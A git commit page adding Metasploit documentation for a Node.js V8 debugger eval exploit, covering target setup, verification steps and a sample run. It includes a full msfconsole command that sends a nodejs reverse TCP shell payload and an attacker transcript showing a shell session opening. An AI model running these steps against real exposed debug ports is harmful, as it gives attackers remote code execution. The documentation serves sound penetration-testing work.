add docs for nodejs debugger eval exploit
Patrick Thomas
parent
d71f7876b8
commit
637b83a0ea
|
|
@ -0,0 +1,64 @@
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
Current and historical versions of node (or any JS env based on the
|
||||||
|
V8 JS engine) have this functionality and could be exploitable if
|
||||||
|
configured to expose the JS port on an untrusted interface.
|
||||||
|
|
||||||
|
Install a version of node using any of the normal methods:
|
||||||
|
* Vendor: https://nodejs.org/en/download/package-manager/
|
||||||
|
* Distro: `sudo apt-get install nodejs`
|
||||||
|
|
||||||
|
Alternately, use standard node docker containers as targets:
|
||||||
|
```
|
||||||
|
$ docker run -it --rm -p 5858:5858 node:4-wheezy node --debug=0.0.0.0:5858
|
||||||
|
```
|
||||||
|
(Others at https://hub.docker.com/_/node/)
|
||||||
|
|
||||||
|
Tested on Node 7.x, 6.x, 4.x
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Run a node process exposing the debug port
|
||||||
|
```
|
||||||
|
node --debug=0.0.0.0:5858
|
||||||
|
```
|
||||||
|
|
||||||
|
2. Exploit it and catch the callback:
|
||||||
|
|
||||||
|
```
|
||||||
|
msfconsole -x "use exploit/multi/misc/nodejs_v8_debugger; set RHOST 127.0.0.1; set PAYLOAD nodejs/shell_reverse_tcp; set LHOST 127.0.0.1; handler -H 0.0.0.0 -P 4444 -p nodejs/shell_reverse_tcp; exploit
|
||||||
|
```
|
||||||
|
(If using docker hosts as targets for testing, ensure that LHOST addr is accessible to the container)
|
||||||
|
|
||||||
|
Note that in older Node versions (notably 4.8.4), the debugger will not immediately process the incoming eval message. As soon as there is some kind of activity
|
||||||
|
(such as a step or continue in the debugger, or just hitting enter), the payload will execute and the handler session will start.
|
||||||
|
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
### Example Run (Node 7.x)
|
||||||
|
|
||||||
|
Victim:
|
||||||
|
```
|
||||||
|
$ node --version
|
||||||
|
v7.10.0
|
||||||
|
$ node --debug=0.0.0.0:5858
|
||||||
|
(node:83089) DeprecationWarning: node --debug is deprecated. Please use node --inspect instead.
|
||||||
|
Debugger listening on 0.0.0.0:5858
|
||||||
|
>
|
||||||
|
(To exit, press ^C again or type .exit)
|
||||||
|
```
|
||||||
|
|
||||||
|
Attacker:
|
||||||
|
```
|
||||||
|
msf exploit(nodejs_v8_debugger) > exploit
|
||||||
|
|
||||||
|
[*] Started reverse TCP handler on 10.0.0.141:4444
|
||||||
|
[*] 127.0.0.1:5858 - Sending 745 byte payload...
|
||||||
|
[*] 127.0.0.1:5858 - Got success response
|
||||||
|
[*] Command shell session 4 opened (10.0.0.141:4444 -> 10.0.0.141:53168) at 2017-09-04 00:37:17 -0700
|
||||||
|
|
||||||
|
id
|
||||||
|
(redacted)
|
||||||
|
```
|
||||||
|
|
||||||
Loading…
Reference in New Issue